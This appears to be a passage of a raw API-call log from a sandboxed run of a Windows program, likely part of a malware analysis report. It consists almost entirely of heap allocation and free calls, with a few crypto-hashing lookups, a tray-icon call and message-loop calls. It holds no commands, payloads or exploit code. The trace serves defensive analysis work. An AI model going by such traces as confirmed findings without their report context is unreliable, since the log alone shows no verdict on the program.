RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83628 [0264.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810f0 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca818 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xcbb940 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe81120 [0264.832] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.832] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835f8 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83640 [0264.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83610 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810c0 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1690 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca858 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xef3e98 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835c8 [0264.833] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835c8 | out: hHeap=0xc60000) returned 1 [0264.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef3e98 | out: hHeap=0xc60000) returned 1 [0264.833] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca858 | out: hHeap=0xc60000) returned 1 [0264.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810c0 | out: hHeap=0xc60000) returned 1 [0264.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe810c0 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe835c8 [0264.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83460 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16d0 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80eb0 [0264.834] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833b8 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.834] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833d0 [0264.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.834] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1690 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833d0 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16a0 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833b8 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16a0 | out: hHeap=0xc60000) returned 1 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16a0 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833b8 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1660 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833d0 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.835] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1660 | out: hHeap=0xc60000) returned 1 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1660 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833d0 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.835] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1650 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833b8 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xc60000) returned 1 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1650 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833b8 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1640 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833d0 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1640 | out: hHeap=0xc60000) returned 1 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833d0 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1640 [0264.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0264.836] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xe) returned 0xe833b8 [0264.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0xe833b8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0264.836] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.837] GetProcAddress (hModule=0x74f20000, lpProcName="CryptHashData") returned 0x74f2df36 [0264.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833d0 | out: hHeap=0xc60000) returned 1 [0264.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1640 | out: hHeap=0xc60000) returned 1 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb778 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1640 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1630 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1620 [0264.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1640 | out: hHeap=0xc60000) returned 1 [0264.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1630 | out: hHeap=0xc60000) returned 1 [0264.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1620 | out: hHeap=0xc60000) returned 1 [0264.837] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb778 | out: hHeap=0xc60000) returned 1 [0264.837] CryptHashData (hHash=0xef1d20, pbData=0xe834c0, dwDataLen=0xd, dwFlags=0x1) returned 1 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1620 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x214) returned 0xca75a8 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca858 [0264.837] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833d0 [0264.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833b8 [0264.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80e80 [0264.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1630 [0264.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80e80 | out: hHeap=0xc60000) returned 1 [0264.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1630 | out: hHeap=0xc60000) returned 1 [0264.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833b8 | out: hHeap=0xc60000) returned 1 [0264.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833b8 [0264.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80e80 [0264.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83388 [0264.838] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1630 [0264.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83388 | out: hHeap=0xc60000) returned 1 [0264.838] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1630 | out: hHeap=0xc60000) returned 1 [0264.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80e80 | out: hHeap=0xc60000) returned 1 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80e80 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83388 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833a0 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1630 [0264.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833a0 | out: hHeap=0xc60000) returned 1 [0264.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1630 | out: hHeap=0xc60000) returned 1 [0264.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83388 | out: hHeap=0xc60000) returned 1 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x14) returned 0xeca878 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x24) returned 0xef3e98 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83388 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1630 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833a0 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80e50 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83358 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83358 | out: hHeap=0xc60000) returned 1 [0264.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.839] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80e50 | out: hHeap=0xc60000) returned 1 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80e50 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83358 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83370 [0264.839] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1700 [0264.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83370 | out: hHeap=0xc60000) returned 1 [0264.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1700 | out: hHeap=0xc60000) returned 1 [0264.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83358 | out: hHeap=0xc60000) returned 1 [0264.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1690 | out: hHeap=0xc60000) returned 1 [0264.840] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16a0 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1660 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xebb750 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80eb0 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83550 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80fa0 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe834a8 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83478 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f70 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81150 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f40 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83658 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83628 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83670 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe81120 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xcbb940 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca818 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810f0 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83640 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835f8 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83610 | out: hHeap=0xc60000) returned 1 [0264.841] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe835c8 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe810c0 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83460 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80f10 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83418 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83430 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe80ee0 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833e8 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe83400 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7d8 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1720 | out: hHeap=0xc60000) returned 1 [0264.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1720 [0264.842] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1620 | out: hHeap=0xc60000) returned 1 [0264.842] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 1 [0264.842] TranslateAcceleratorW (hWnd=0x80170, hAccTable=0x150171, lpMsg=0x91f57c) returned 0 [0264.842] IsDialogMessageW (hDlg=0x80170, lpMsg=0x91f57c) returned 0 [0264.842] TranslateMessage (lpMsg=0x91f57c) returned 0 [0264.842] DispatchMessageW (lpMsg=0x91f57c) returned 0x0 [0264.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7380 [0264.842] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef1620 [0264.842] Shell_NotifyIconW (dwMessage=0x1, lpData=0x91ec18) returned 1 [0264.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.843] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1620 | out: hHeap=0xc60000) returned 1 [0264.843] KillTimer (hWnd=0x50172, uIDEvent=0x1) returned 1 [0264.843] SetTimer (hWnd=0x50172, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0264.843] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1620 [0264.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20a) returned 0xca7380 [0264.843] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16c0 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xca7380 | out: hHeap=0xc60000) returned 1 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16f0 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x18) returned 0xeca7d8 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xeca7d8 | out: hHeap=0xc60000) returned 1 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1620 | out: hHeap=0xc60000) returned 1 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x38) returned 0xef1d60 [0264.844] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef1d60 | out: hHeap=0xc60000) returned 1 [0264.844] PeekMessageW (in: lpMsg=0x91f57c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91f57c) returned 0 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef1620 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x20) returned 0xebb750 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe83400 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x4) returned 0xef16f0 [0264.844] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x30) returned 0xee0cb8 [0264.844] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0264.844] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xee0cb8 | out: hHeap=0xc60000) returned 1 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0xc) returned 0xe833e8 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x40) returned 0xe8c880 [0264.845] PeekMessageW (in: lpMsg=0x91ef14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x91ef14) returned 0 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16f0 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16d0 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16d0 | out: hHeap=0xc60000) returned 1 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16f0 | out: hHeap=0xc60000) returned 1 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe8c880 | out: hHeap=0xc60000) returned 1 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xe833e8 | out: hHeap=0xc60000) returned 1 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 | out: hHeap=0xc60000) returned 1 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe833e8 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x8) returned 0xef16c0 [0264.845] RtlAllocateHeap (HeapHandle=0xc60000, Flags=0x0, Size=0x10) returned 0xe80ee0 [0264.845] HeapFree (in: hHeap=0xc60000, dwFlags=0x0, lpMem=0xef16c0 